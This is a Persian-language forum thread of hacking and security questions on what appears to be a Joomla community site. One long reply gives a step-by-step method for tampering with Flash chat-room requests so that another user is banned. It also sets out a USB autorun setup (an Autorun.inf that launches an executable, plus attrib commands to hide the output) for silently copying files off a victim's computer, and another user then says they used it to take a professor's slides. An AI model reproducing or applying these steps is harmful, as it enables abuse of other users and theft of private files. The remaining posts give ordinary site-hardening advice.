spyman

_.-*سوالات هک و امنیت*-._

14 پست در این موضوع

ارسال شده در (ویرایش شده)

سلام خدمت همه دوستان

این تاپیک رو فقط به سوالات هک و امنیت اختصاص دادیم که همگی شما مشکلات خود را بگوید تا کسانی که اطلاعاتی دارند جواب بدهند .

قوانین تاپیک :

1- قبل از پرسیدن سوال تایپیک _.-* آموزش قدم به قدم هک *-._ بخونید . اگر جواب نگرفتین سوال کنین .

2- جهت بالا بردن امنیت جومیلا به تایپیک _.-*دیوار آتش برای جومیلا*-._ قرار داده شود .

3 -_.-*بازار باگ جوملا مخلوت ( جدام نمیشه . درهم و برهمه )*-._

4 -_.-*نفوذ به سیستم مدیریت محتوای Joomla به همراه مثال*-._

5 - از دادن جوابهای ناقص و نا مفهوم و همچنین گمراه کننده خوداری کنید .

6 - در صورتی که با پستی موافق هستید فقط دگمه تشکر رو بزنید تا مدیریت هم از امار موافق اون مورد اطلاع پیدا کنه.

7- تمرینات تو گروه هک انجام میدم و کسای که میخوان بیان پیام خصوصی بدن .

ویرایش شده در توسط spyman

Share this post


Link to post
Share on other sites
حتما میدانید كه راههای زیادی برای ریدایركت كردن فایلی خاص به فایل دیگر وجود دارد اما بهترین كار همین است كه میگویم

در فایل خط زیر را وارد كنید :

Redirect /OldDir/OldFile.html http://www.domainname.com/newdir

بنابراین دستور به شرح زیر است

Redirect oldlocation newlocation

منتهی یادتان باشد كه newlocation باید نام ادرس كامل سایت باشد .

اگه یکی از آدرس ها فارسی باشه باید چه کار کرد؟

به همین صورتی که فارسی فاکس کد میده قرار بدیم یا نه به صورت همون فارسی؟

Share this post


Link to post
Share on other sites
اگه یکی از آدرس ها فارسی باشه باید چه کار کرد؟

به همین صورتی که فارسی فاکس کد میده قرار بدیم یا نه به صورت همون فارسی؟

فرقی نداره

دوست عزیز در پست اول گفتید که robotx.txt رو برداریم . این مشکل ساز نمیشه؟

لطفا سوال خودتون اینجا بپورسید .شما که مدیر یک بخشی هستی قانون تایپیک رعایت نکنی از بقی تباید توقی رعایت قانونو داشت

مشکل ساز نیست ولی تمام شاخه های مارو نشون میده . اینجوری بگم یه هکر میگرده و اطلاعات پیدا کنه هرچی ما کمتر بهش اطلاعات بدیم اون کارش سخت تر میشه و هرچه بیشتر سختش کنیم هک کمتر میشیم .

فکنم این توضیح کافی اگه سوال داری اینجا بپورس لطفا

Share this post


Link to post
Share on other sites

سلام . میخواستم بپرسم قرار دادن کدهای فلش در سایت در امنیت تاثیر داره یا نه و اگه ممکنه موردی باشه ، اگه یکم توضیح بدید ممنون میشم

Share this post


Link to post
Share on other sites
سلام . میخواستم بپرسم قرار دادن کدهای فلش در سایت در امنیت تاثیر داره یا نه و اگه ممکنه موردی باشه ، اگه یکم توضیح بدید ممنون میشم

سلام

من جواب شمارو دست بندی میگنم و جواب میدم سوال شما خیلی نامفهومه کمی بازش میکردی بهتر بود

1 - هك چت روم فلش

این چترو ها دارای app باگ xss هستندو از این آموزش امیدوارم کسی سو استفاده نکنه فقط جهته آموزشهههههه

یه توضیح کلی میدم واسه اونایی که واردن اوناییم که یه کم ناوردن میتونن کلیپ پیوست رو دانلود کنن.

خوب واسه این که شما یه نفر رو با آی پی از چت روم های فلش چت اخراج کنید اول به 2 تا چیز نیاز دارید:

1. بروزر فایرفکس mozila firefox)

2. افزونه تمپر دیتا tamper data addons

ابتدا فایرفکس رو از لینک زیر دانلود کنید سپس افزونه مورد نیاز یعنی تمپر دیتا رو باز هم از لینکی که در زیر اومده دانلود کنید و بر روی فایر فاکس نصب کنید.

حالا بعد از اینکه موارد مورد نیاز نصب شد میریم سراغ اصل مطلب خوب اول وارد چت روم می شید بعد به کسی که می خواید اخراجش کنید یه پیام بدید بعدش از بالا از گزینه tools افزونه tamper data رو باز کنید و بر روی دکمه start tamper کلیک کنید سپس در خود صفحه چت پیامی رو که نوشتید برای اون شخص ارسال کنید بعد tamper data به شما یه ارور میده که بر روی tamper کلیک می کنید و در سمت راست فحه یه کد مانند کد زیر مشاهده می کنید:

[pjp]

sendAndLoad=%5Btype%20Function%5D&t=aaa&r=0&u=319& b=542211&c=msg&cid=1&id=6b96ce2a52fdba3a89d586e297 461ecf

[/php]

که شما فقط باید سه قسمت اون رو تغییر بدید:

1. قبل از t& عبارت s=7& رواضافه کنید.

2. عبارت c=msg رو به c=banu تغییر بدید.

3.عبارت b=xxxx رو به b=3 تغییر بدید.

که برای کد بالا با در نظر گرفتن تغییرات داریم:

[pjp]

sendAndLoad=%5Btype%20Function%5D&s=7&t=aaa&r=0&u= 319&b=3&c=banu&cid=1&id=6b96ce2a52fdba3a89d586e297 461ecf

[/php]

بعد هم اوکی رو بزنید و طرف اخراج میشه و تا 9 ساعت نمی تونه وارد روم شه. اول دو نرم افزار مرورگر فاير فكس و افزونه ي تمپر ديتا را دانلود نماييد

دانلود فایر فاکس نسخه3.6.3http://www.4shared.com/file/Nncwaq07/Firefox_Setup_363.html

*********************

دانلود Tamper Data

https://addons.mozilla.org/en-US/firefox/addon/966/

سپس كساني كه به اينترنت اشنايي ندارن آموزش تصويري را دانلود كنند.

http://www.dll.far30online.ir/room/f...line.ir%29.zip

دانلود کلیپ تصویری آموزش بعد از اين توضیح کلی میدم واسه اونایی که واردن .

بعد از دانلود و نصب مرورگر فاير فكس از لينك بالا و بعد از آن افزونه مورد نیاز یعنی

تمپر دیتا رو باز هم از لینکی که در بالا قرار داده ايم دانلود کنید و بر روی فایر

فاکسي كه از دانلودس ايران دانلود كرديد نصب کنید.

حالا بعد از اینکه موارد مورد نیاز نصب شد میریم سراغ اصل مطلب

اول وارد چت روم می شويد بعد به کسی که می خواید اخراجش کنید روش

كليك كرده و پيام خصوصي را بزنيد پنجره اي باز ميشود داخل پنجره يه نقطه يا

عدد بگذاريد

سپس از بالا از گزینه tools افزونه tamper data رو باز کنید و بر روی دکمه

start tamper کلیک کنید.

بعد

از اين اگر پنجره ي سه گزينه ي تمپر باز شد ببنديد و اگر نشد پيغامي را كه در

پنجره ي شخص مورد نظر نوشته بوديد را ارسال نماييد به محض اين كار اين افزونه

به شما يك پنجره ي سه گزينه اي قرار ميدهد كه شما بر روي tamper کلیک

می کنید و در سمت راست صفحه یه کد مانند کد زیر مشاهده می کنید:

کد:

sendAndLoad=%5Btype%20Function%5D&t=aaa&r=0&u=319& b=542211&c=msg&cid=1&id=6b96ce2a52fdba3a89d586e297 461ecf

که شما فقط باید :

1. قبل از t& عبارت s=7& روتايپ كنيدكه اضافه شود به كدي كه در اختيار

شما قرار گرفته.

2. عبارت c=msg را به c=banu تغییر بدید. (به جاي مسيج ، بن يو بنويسيد)

3.عبارت b=542211 رو به b=3 تغییر بدید. (هر عددي كه تمپر به شما داد را

به عدد 3 تغيير دهيد به عبارتي بي مساوي سه)

اين كد پاييني كه مشاهده ميفرماييد بعد از تغيير دادن كد بالا خاصل

گرديده كه به شكل زير تصحيح شده

کد:

sendAndLoad=%5Btype%20Function%5D&s=7&t=aaa&r=0&u= 319&b=3&c=banu&cid=1&id=6b96ce2a52fdba3a89d586e297 461ecf

سپس بعد از تغييرات كدي كه تمپر شما در اختيارتان قرار داده است اوكي كنيد.

دوباره پنجره ي سه گزينه اي تمپر باز ميشود شما بايد تيك كانتينيو را برداريد و

دوباره تمپر را بزنيد.

كه حاصل زخمت شما اخراج اون طرف مقابل رو به همراه دارد.

نكته ي مهم .

شما اين كدتغيير كرده را نبايد كپي كنيد .

شما بايد اون كدي رو كه خود افزونه ي ديتا ميدهد رو تغيير بدهيد

دقت داشته باشيد مراحل تغيير و اصلاح كد را بايد به صورت سريع بنويسيد و اجرا

كنيد.

پيدا کردن پسورد ادمين تو چت روم های فلش سخته اما ميتونی وقتی که کيک يا بن شدی به لينک زير بری و اسم چت روم رو تو ليست پيدا و کنی delete site رو بزنی و بن يا کيک شما باز ميشه

www.macromedia.com/support/documentation/en/flashplayer/help/settings_manager07.html

حوب این از چت روم

با استفاده ار این برنامه می تونید با اتصال فلش مموری به سیستم قربانی فایلهای دلخواهتون رو کش برین.

امکانات برنامه:

1.سرعت بالا در کپی فایلها

2.هیچ آنتی ویروسی بهش گیر نمیده

3.تعیین فرمت فایلهای مورد نظر برای سرقت + تعیین پوشه های خاص برای جستجو

4.عملیات به صورت سایلنت انجام میشه یعنی قربانی روحشم خبردار نمیشه

5.بعد از سرقت برنامه بدون هیچ پیغامی بسته میشه.

روش کار :

یک فایل Autorun.inf بسازید اینا رو توش کپی کنید :

کد:

[autorun]

OPEN=Ashiyane.exe

shell\\\\\\\\open\\\\\\\\Command = Ashiyane.exe

shell\\\\\\\\explore\\\\\\\\Command = Ashiyane.exe

shell\\\\\\\\Autoplay\\\\\\\\Command = Ashiyane.exe

حالا در کنار برنامه 2 فایل تکست و یک پوشه با نام Ashiyane ایجاد کنید : فایلهای سرقت شده درون پوشه آشیانه کپی می شوند.

files.txt

paths.txt

توی Files.txt اینطوری بنویسید : اینا فرمتهای فایلی که شما می خواین کش برین در هر خط یک فرمت !!!

کد:

Jpg

*.exe

تویpaths.txt اینطوری بنویسید :مسیرهایی که فایلهای مورد نظر شما قرار دارند !! مثلا MyPicture

کد:

c:\\\\\\\\\\\\\\\\pictures

d:\\\\\\\\\\\\\\\\Programs

برای اینکه فایلها رو مخفی کنید Run-Cmd.exe

کد:

attrib L:\\\\\\\\\\\\\\\\ashiyane +h +s

attrib L:\\\\\\\\\\\\\\\\files.txt +h +s

attrib L:\\\\\\\\\\\\\\\\paths.txt +h +s

این یه توضیح کوچولو در باره سرقت اطلاعات توسط فلش مموری

Share this post


Link to post
Share on other sites
سوال شما خیلی نامفهومه کمی بازش میکردی بهتر بود

نه من منظورم کد های ساده اوقات شرعی یا ساعت و تقویم بود .

توضیحات بالا هم خیلی مفید بود . فقط یه سوال در مورد توضیحات بالا ، چگونه من بفهمم که فلش مموری که به کامپیوتر منه قربانی وصله ، از این دست برنامه ها نداره

Share this post


Link to post
Share on other sites

اینا بیشتر از فایلای text هستن و فهمیدنش خیلی هم آسون نیست و بیشتر برای هک اظلاعات مهم یک مکانی استفاده میشه .... در این باره سوال نکن چون نمیتونم جواب بدم .

در باره سوال شمام بگم یه هکرمیگرده دونبال این که در کد نویسی شما ارور برنامه نویسی و باگهای sql یا xss و یا خیلی دیگرو پیدا کنه و از اون برای پیدا کردن راهی برای نفوز به سایت پیدا کنه و اگر با افزودن کد مشکلات گفته شده ایجاد نمیشه مشکلی نداره .:auizz3ffy9vla57584x

Share this post


Link to post
Share on other sites

سرقت فایل فلش مموری به کار می یاد خیلی، مثلا این ترم کلی به زحمت افتادیم تا استادا از کلاس ببریم بیرون و فایل های پاورپوینتش را کپی کنیم. اخه می دونه اگه این فایل ها را داشته باشیم کسی دیگه کلاس نمی یاد :eek:

حالا من این توضیحات شما را انجام دادم اما عمل نمی کنه؟

چه طور ران میشه این برنامه؟

Share this post


Link to post
Share on other sites

ارسال شده در (ویرایش شده)

به دلیل این چیزا من نمیتونم برنامه کامل بدم . این برنامه خیلی کد نویسی راحتی داره ولی ... ، من نمیتونم برنامرو بدم کمی سرچ کنی پیدا میکنی :( بیشتر نمیتونم توضیح بدم

اگه مدیر کل انمن اجازش بده با در نظر گرفتن تمام چیزای که داره میزارم اینجا

ویرایش شده در توسط spyman

Share this post


Link to post
Share on other sites

سلام دوست عزیز

خدا قوت

من تو لوکال هاست شرکت وب سایت راه اندازی کردم و به کاربران شرکت که حدود 100 نفر هستند دارم خدمات می دم

اینم بگم که هم روز به روز مشتریان پورتال در شرکت داره زیاد می شه و هم اینکه خدمات و ... که تو پورتال میزارم بیشتر میشه

می خوام مراحل تامین امنیت سرور و پورتال رو اگر امکانش هست لطف کنی و برام توضیح بدی تا منم همونارو برای تامین امنیت انجام بدم

همکارانم ممکنه پورتال رو هک کنن

سپاس

Share this post


Link to post
Share on other sites
راهنمایی کنید لطفا ؟ متشکرم ...

دوست عزیز برای تامین امنیت پورتال شما دو بحث مطرح هست

1.تامین امنیت سیستمی که جوملا بروی آن نصب است(لوکال هاست)

2.تامین امنیت خود جوملا شمای

برای تامین امنیت لوکال می بایست از اینترنت سکوریتی و یا فایروال ها استفاده کنید(مورد های پشنهادی:کومودو و کسپرسکی هست) که برای کسپراسکی تاپیک زیر رو پیگیری کنید

تاپیک جامع آموزش تصویری پیکربندی آنتی ویروس،فایروال و پسورد منیجر کاسپراسکای

برای تامین امنیت جوملا هم که استاد افضلی زحمت کشیدند و مطالب رو بطور کامل توضیح دادند

لینک تاپیک های امنیت سایت

البته این صحبت استاد افضلی فراموشتون نشه امنیت مطلق نیست

سوال خاصی بود در خدمت هستم،موفق باشید.

Share this post


Link to post
Share on other sites

اگر امکانش باشه بیشتر توضیح بدهید ممنون میشم

موفق باشید

Share this post


Link to post
Share on other sites

با سلام

بنده بسیار علاقه مند به فرا گیری مبانی کامپیوتر هستم

به همین دلیل برای یادگیری به سایت های موسسسات آموزشی مراجعه کردم اما با قیمت گزاف و سرسام آور آن ها مواجه شدم

برای همین خواستم از شما بپرسم کدام از زبان های برنامه نویسی را میتوان با ویدیو های آموزشی و مطالبی که رایگان در اینترنت قرار گرفته فرا گرفت و کدام دسته از زبان های برنامه نویسی نیازمند کلاس های آموزشی هستش؟؟؟؟

و اینکه اصولا برای یادگیری هک به صورت پیشرفته کدام زبان های برنامه نویسی را باید فرا گرفت؟؟؟؟

ممنون

Share this post


Link to post
Share on other sites

برای ارسال نظر یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید نظر ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در انجمن ما ثبت نام کنید. عضویت خیلی ساده است !


ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید


ورود به حساب کاربری